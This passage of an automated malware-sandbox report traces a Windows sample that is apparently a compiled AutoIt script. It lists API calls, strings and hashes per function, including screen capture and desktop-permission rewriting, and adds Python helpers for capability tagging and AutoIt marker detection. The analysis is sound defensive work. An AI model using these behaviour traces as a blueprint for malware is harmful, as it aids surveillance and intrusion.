                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00E59431), ref: 00E5BBCA
                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E5BC03
                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E5BC46
                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E5BC7D
                                          • FreeLibrary.KERNEL32(?), ref: 00E5BC89
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E5BC99
                                          • DestroyCursor.USER32(?), ref: 00E5BCA8
                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E5BCC5
                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E5BCD1
                                            • Part of subcall function 00DF313D: __wcsicmp_l.LIBCMT ref: 00DF31C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                          • String ID: .dll$.exe$.icl
                                          • API String ID: 3907162815-1154884017
                                          • Opcode ID: 2af4a70d467e8084c9f0258e3f9f09f7855dc80b9902169c251cd10579386ab8
                                          • Instruction ID: 9f09fda1dfa9f1551fa8c025d5628b9d7b73ce16e456c63c57c0ac23d276dda0
                                          • Opcode Fuzzy Hash: 2af4a70d467e8084c9f0258e3f9f09f7855dc80b9902169c251cd10579386ab8
                                          • Instruction Fuzzy Hash: 1F61E171540719BEEB14DF64CC45FBAB7A8EB08712F105916FD15E61D0DB70AA88CBB0
                                          APIs
                                          • LoadStringW.USER32(00000066,?,00000FFF,00E5FB78), ref: 00E3A0FC
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 00E3A11E
                                          • __swprintf.LIBCMT ref: 00E3A177
                                          • __swprintf.LIBCMT ref: 00E3A190
                                          • _wprintf.LIBCMT ref: 00E3A246
                                          • _wprintf.LIBCMT ref: 00E3A264
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%
                                          • API String ID: 311963372-1048875529
                                          • Opcode ID: 55217c7f213d6562a4e51fb30d993eb33fee87c109ba1f68dddc80b451093622
                                          • Instruction ID: b4dd0573396d2e35537d422d5a6f388799f244f9ab8d0aed54978b5d9c413f57
                                          • Opcode Fuzzy Hash: 55217c7f213d6562a4e51fb30d993eb33fee87c109ba1f68dddc80b451093622
                                          • Instruction Fuzzy Hash: 67515C7190021AAACF15EBE0DD86EEEB779EF04304F1411A6F505721A1EB316F98DB71
                                          APIs
                                            • Part of subcall function 00DD9997: __itow.LIBCMT ref: 00DD99C2
                                            • Part of subcall function 00DD9997: __swprintf.LIBCMT ref: 00DD9A0C
                                          • CharLowerBuffW.USER32(?,?), ref: 00E3A636
                                          • GetDriveTypeW.KERNEL32 ref: 00E3A683
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E3A6CB
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E3A702
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E3A730
                                            • Part of subcall function 00DD7D2C: _memmove.LIBCMT ref: 00DD7D66
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                          • API String ID: 2698844021-4113822522
                                          • Opcode ID: 07ccd8340aa226b652ae9677f034583c57648311143b9e0fa49e4c9709e8c241
                                          • Instruction ID: 7004f347f569bc22d6edc24da6589eeab87065ec36a35a43ab7bb3d0a61061aa
                                          • Opcode Fuzzy Hash: 07ccd8340aa226b652ae9677f034583c57648311143b9e0fa49e4c9709e8c241
                                          • Instruction Fuzzy Hash: 7E514C711043059FC714EF20C89196AB7F4FF94718F08596EF89A67361EB31AE0ACB62
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E3A47A
                                          • __swprintf.LIBCMT ref: 00E3A49C
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E3A4D9
                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E3A4FE
                                          • _memset.LIBCMT ref: 00E3A51D
                                          • _wcsncpy.LIBCMT ref: 00E3A559
                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E3A58E
                                          • CloseHandle.KERNEL32(00000000), ref: 00E3A599
                                          • RemoveDirectoryW.KERNEL32(?), ref: 00E3A5A2
                                          • CloseHandle.KERNEL32(00000000), ref: 00E3A5AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                          • String ID: :$\$\??\%s
                                          • API String ID: 2733774712-3457252023
                                          • Opcode ID: 355c8da239bef3324a070bff71b80ca66d44ca06516359eefa660e395a7a36f3
                                          • Instruction ID: b60b23c30ba9d944af3d3951cd7dbdbcfcc4c4ca7dc825bee3448d7c8916f1a9
                                          • Opcode Fuzzy Hash: 355c8da239bef3324a070bff71b80ca66d44ca06516359eefa660e395a7a36f3
                                          • Instruction Fuzzy Hash: 6B3180B5500209ABDB219FA1DC49FEB77BCEF88705F1441B6FA48E6160E7709684CB25
                                          APIs
                                            • Part of subcall function 00E2874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E28766
                                            • Part of subcall function 00E2874A: GetLastError.KERNEL32(?,00E2822A,?,?,?), ref: 00E28770
                                            • Part of subcall function 00E2874A: GetProcessHeap.KERNEL32(00000008,?,?,00E2822A,?,?,?), ref: 00E2877F
                                            • Part of subcall function 00E2874A: RtlAllocateHeap.NTDLL(00000000,?,00E2822A), ref: 00E28786
                                            • Part of subcall function 00E2874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E2879D
                                            • Part of subcall function 00E287E7: GetProcessHeap.KERNEL32(00000008,00E28240,00000000,00000000,?,00E28240,?), ref: 00E287F3
                                            • Part of subcall function 00E287E7: RtlAllocateHeap.NTDLL(00000000,?,00E28240), ref: 00E287FA
                                            • Part of subcall function 00E287E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E28240,?), ref: 00E2880B
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E28458
                                          • _memset.LIBCMT ref: 00E2846D
                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E2848C
                                          • GetLengthSid.ADVAPI32(?), ref: 00E2849D
                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00E284DA
                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E284F6
                                          • GetLengthSid.ADVAPI32(?), ref: 00E28513
                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E28522
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00E28529
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E2854A
                                          • CopySid.ADVAPI32(00000000), ref: 00E28551
                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E28582
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E285A8
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E285BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                          • String ID:
                                          • API String ID: 2347767575-0
                                          • Opcode ID: 70a558c09f1d3096c48808269c66598eaee3eaf8c972bcab4af21cd16ae2ef69
                                          • Instruction ID: 7d3680ffb17c8f71a52c7bb56f278c8aa68b78004a8ca0f76a87e0257b70742f
                                          • Opcode Fuzzy Hash: 70a558c09f1d3096c48808269c66598eaee3eaf8c972bcab4af21cd16ae2ef69
                                          • Instruction Fuzzy Hash: 5861587190122AAFDF04DFA1ED44AAEBBB9FF04305F088529E815B7291DB349A04CF60
                                          APIs
                                          • GetDC.USER32(00000000), ref: 00E476A2
                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00E476AE
                                          • CreateCompatibleDC.GDI32(?), ref: 00E476BA
                                          • SelectObject.GDI32(00000000,?), ref: 00E476C7
                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00E4771B
                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00E47757
                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00E4777B
                                          • SelectObject.GDI32(00000006,?), ref: 00E47783
                                          • DeleteObject.GDI32(?), ref: 00E4778C
                                          • DeleteDC.GDI32(00000006), ref: 00E47793
                                          • ReleaseDC.USER32(00000000,?), ref: 00E4779E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                          • String ID: (
                                          • API String ID: 2598888154-3887548279
                                          • Opcode ID: 76f0b688848c787436076eebeb9ccc5081bab6ab362286fbc114029bb789bb08
                                          • Instruction ID: 6f4358389b791aa30461b8bdb72bb7b53df419253a9ee89b7c9dbf42a93e2d59
                                          • Opcode Fuzzy Hash: 76f0b688848c787436076eebeb9ccc5081bab6ab362286fbc114029bb789bb08
                                          • Instruction Fuzzy Hash: 56514B75904309EFCB15CFA9DC85EAEBBB9EF48311F14852DF989A7250D731A844CBA0
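The two records above (the DACL rewrite on a window station or desktop object via GetUserObjectSecurity / AddAce / SetUserObjectSecurity, and the GDI screen copy via GetDC / CreateCompatibleBitmap / StretchBlt / GetDIBits) are the kind of call sets a triager turns into capability tags and breakpoint lists. The following Python is an added example, not part of the Joe Sandbox report: it parses the report's own "APIs" bullet format, keeps the literal arguments (so the SRCCOPY raster-op 0x00CC0020 passed to StretchBlt survives), and matches the call set against a small capability table. The capability names and the API sets behind them are this example's own assumptions; the two sample records are excerpts copied from the report text above.

```python
"""Parse the "APIs" bullets of a Joe Sandbox function record and map the
call set to coarse capabilities.

Added example, not part of the report. CAPABILITIES is this example's own
table (names and API sets are assumptions chosen to cover the two records
above); DACL_RECORD and SCREENSHOT_RECORD are excerpts copied from the report.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# One bullet: optional "Part of subcall function ADDR:", then Api.MODULE(args), ref: ADDR.
# Lines such as "_memset.LIBCMT ref: ..." carry no argument list at all.
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple           # int for a hex literal, None for '?', str for anything else
    ref: int              # address of the call site
    subcall: Optional[str]  # address of the callee when the bullet is a subcall entry


def _parse_arg(tok: str):
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    try:
        return int(tok, 16)
    except ValueError:
        return tok        # e.g. BUTTON or "status PlayMe mode" are kept verbatim


def parse_api_lines(record: str) -> List[ApiCall]:
    calls = []
    for line in record.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue      # section headers such as "APIs" / "Strings"
        args = tuple(_parse_arg(t) for t in m["args"].split(",")) if m["args"] is not None else ()
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"]))
    return calls


# Capability fires when every API in its set is present in the record.
CAPABILITIES = {
    "screenshot (GDI bitmap copy)": {"GetDC", "CreateCompatibleBitmap", "GetDIBits"},
    "window-station/desktop DACL rewrite": {"GetUserObjectSecurity", "AddAce", "SetUserObjectSecurity"},
    "security descriptor build": {"InitializeSecurityDescriptor", "SetSecurityDescriptorDacl"},
}


def infer_capabilities(calls: List[ApiCall], include_subcalls: bool = True) -> Set[str]:
    names = {c.api for c in calls if include_subcalls or c.subcall is None}
    return {cap for cap, needed in CAPABILITIES.items() if needed <= names}


def breakpoints(calls: List[ApiCall], apis: Set[str]) -> List[int]:
    """Call-site addresses for the given APIs, e.g. to break on in a debugger."""
    return sorted(c.ref for c in calls if c.api in apis and c.subcall is None)


# Excerpts copied from the two records above (constructed subset, not full records).
DACL_RECORD = """APIs
  • Part of subcall function 00E2874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E28766
  • Part of subcall function 00E287E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E28240,?), ref: 00E2880B
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E28458
• _memset.LIBCMT ref: 00E2846D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E284F6
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E285A8
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E285BC
"""

SCREENSHOT_RECORD = """APIs
• GetDC.USER32(00000000), ref: 00E476A2
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00E476AE
• CreateCompatibleDC.GDI32(?), ref: 00E476BA
• SelectObject.GDI32(00000000,?), ref: 00E476C7
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00E4771B
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00E47757
• ReleaseDC.USER32(00000000,?), ref: 00E4779E
"""

if __name__ == "__main__":
    for name, rec in (("dacl", DACL_RECORD), ("screenshot", SCREENSHOT_RECORD)):
        calls = parse_api_lines(rec)
        print(name, sorted(infer_capabilities(calls)), [hex(a) for a in breakpoints(calls, {"AddAce", "GetDIBits"})])
```

Subcall entries are included by default because the report lists them as part of the function's behaviour; pass include_subcalls=False to see which capabilities the function body alone accounts for (the DACL rewrite then drops out, since GetUserObjectSecurity lives in the callee at 00E2874A).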
                                          APIs
                                            • Part of subcall function 00DF0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00DD6C6C,?,00008000), ref: 00DF0BB7
                                            • Part of subcall function 00DD48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DD48A1,?,?,00DD37C0,?), ref: 00DD48CE
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00DD6D0D
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00DD6E5A
                                            • Part of subcall function 00DD59CD: _wcscpy.LIBCMT ref: 00DD5A05
                                            • Part of subcall function 00DF387D: _iswctype.LIBCMT ref: 00DF3885
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                          • API String ID: 537147316-1018226102
                                          • Opcode ID: cfd5172e480ca3b5e1f79a95edd5260e3bfad620f59fe20cc5b4f29ccb2caa37
                                          • Instruction ID: 706d2673b928d4e3fc62f5bef7c87c0ad296cdd45e763b753b1f6e059e2e7a97
                                          • Opcode Fuzzy Hash: cfd5172e480ca3b5e1f79a95edd5260e3bfad620f59fe20cc5b4f29ccb2caa37
                                          • Instruction Fuzzy Hash: CA026D711083419FC724EF24C891AAFBBE5EF98354F14492EF496A73A1DB30D949CB62
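The String IDs of this record (">>>AUTOIT SCRIPT<<<", "AU3!", "EA06", together with the #include and "Unterminated string" parser errors) belong to the AutoIt runtime's script loader, which is what the "Binary is likely a compiled AutoIt script file" signature in the overview keys on. The Python below is an added example, not part of the Joe Sandbox report: it scans a file for those three markers, in both 8-bit and UTF-16LE form, and reports their offsets. Treating "AU3!" immediately followed by "EA06" as a single tag is an assumption (the report lists the two strings separately), so each marker is also reported on its own; the sample blobs are constructed.

```python
"""Look for the markers the AutoIt runtime uses to find its embedded script.

Added example, not part of the Joe Sandbox report. The three markers are the
String IDs of the function above; treating "AU3!" immediately followed by
"EA06" as one tag is an assumption (the report lists them separately), so
each marker is also reported on its own. SAMPLE_BLOB and CLEAN_BLOB are
constructed inputs.
"""
import re
from dataclasses import dataclass, field
from typing import List

SCRIPT_BANNER = b">>>AUTOIT SCRIPT<<<"
AU3_MAGIC = b"AU3!"
AU3_VERSION = b"EA06"


def _utf16(s: bytes) -> bytes:
    """The runtime works on wide strings, so every marker is checked in UTF-16LE too."""
    return s.decode("ascii").encode("utf-16-le")


def _find_all(data: bytes, needle: bytes) -> List[int]:
    return [m.start() for m in re.finditer(re.escape(needle), data)]


@dataclass
class AutoItScan:
    banner_offsets: List[int] = field(default_factory=list)
    magic_offsets: List[int] = field(default_factory=list)
    version_offsets: List[int] = field(default_factory=list)
    combined_tag: bool = False   # "AU3!" directly followed by "EA06" (assumed layout)

    @property
    def likely_autoit(self) -> bool:
        # The banner alone is distinctive; a bare 4-byte "AU3!" is too short to trust.
        return bool(self.banner_offsets) or self.combined_tag


def scan_autoit_markers(data: bytes) -> AutoItScan:
    res = AutoItScan()
    for raw in (SCRIPT_BANNER, _utf16(SCRIPT_BANNER)):
        res.banner_offsets += _find_all(data, raw)
    magic_hits = []                       # (offset, width) so adjacency is checked per encoding
    for raw in (AU3_MAGIC, _utf16(AU3_MAGIC)):
        magic_hits += [(off, len(raw)) for off in _find_all(data, raw)]
    version_hits = set()
    for raw in (AU3_VERSION, _utf16(AU3_VERSION)):
        version_hits.update(_find_all(data, raw))
    res.magic_offsets = sorted(off for off, _ in magic_hits)
    res.version_offsets = sorted(version_hits)
    res.combined_tag = any(off + width in version_hits for off, width in magic_hits)
    return res


def scan_file(path: str) -> AutoItScan:
    with open(path, "rb") as fh:
        return scan_autoit_markers(fh.read())


# Constructed inputs: a PE-looking blob carrying the markers, and a clean one.
SAMPLE_BLOB = (b"MZ" + b"\x00" * 62 + AU3_MAGIC + AU3_VERSION + b"\x00" * 16
               + _utf16(SCRIPT_BANNER) + b"\x00" * 8)
CLEAN_BLOB = b"MZ" + b"\x00" * 126

if __name__ == "__main__":
    r = scan_autoit_markers(SAMPLE_BLOB)
    print(f"likely AutoIt: {r.likely_autoit}  magic@{r.magic_offsets}  "
          f"version@{r.version_offsets}  banner@{r.banner_offsets}")
```

Run scan_file() against the submitted sample and the dropped files in the report to confirm the static signature independently of the sandbox; a hit on the banner or the combined tag is a strong indication that the payload is an AutoIt script rather than native code.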
                                          APIs
                                          • _memset.LIBCMT ref: 00DD45F9
                                          • GetMenuItemCount.USER32(00E96890), ref: 00E0D7CD
                                          • GetMenuItemCount.USER32(00E96890), ref: 00E0D87D
                                          • GetCursorPos.USER32(?), ref: 00E0D8C1
                                          • SetForegroundWindow.USER32(00000000), ref: 00E0D8CA
                                          • TrackPopupMenuEx.USER32(00E96890,00000000,?,00000000,00000000,00000000), ref: 00E0D8DD
                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E0D8E9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                          • String ID:
                                          • API String ID: 2751501086-0
                                          • Opcode ID: 5af89d2e63aba5f345f2936a25d92d263dfc07e936d232c9a55a2acaf53d1497
                                          • Instruction ID: 3d4c8552f4684522b986effa79bea3207fb9f496decd622d9dd2f8db9cb0bb4b
                                          • Opcode Fuzzy Hash: 5af89d2e63aba5f345f2936a25d92d263dfc07e936d232c9a55a2acaf53d1497
                                          • Instruction Fuzzy Hash: 85710130604205BFEB248F94DC89FAABF64FF04368F244217F615B62E0C7B1A850DBA4
                                          APIs
                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E50038,?,?), ref: 00E510BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                          • API String ID: 3964851224-909552448
                                          • Opcode ID: ef9f19fb03fa2b16207d2fbcb361d4f2def17e36636592aae28ec2fcd00766d2
                                          • Instruction ID: 7d5fc895e978f3f1e453a15cbe93e98b14416a985cdd77ca60d3d1b894b6a400
                                          • Opcode Fuzzy Hash: ef9f19fb03fa2b16207d2fbcb361d4f2def17e36636592aae28ec2fcd00766d2
                                          • Instruction Fuzzy Hash: 2F415B3015524E8BCF20EF90DD91AEA3B24EF52305F506895ED956B6A2DB30AD1ACB70
                                          APIs
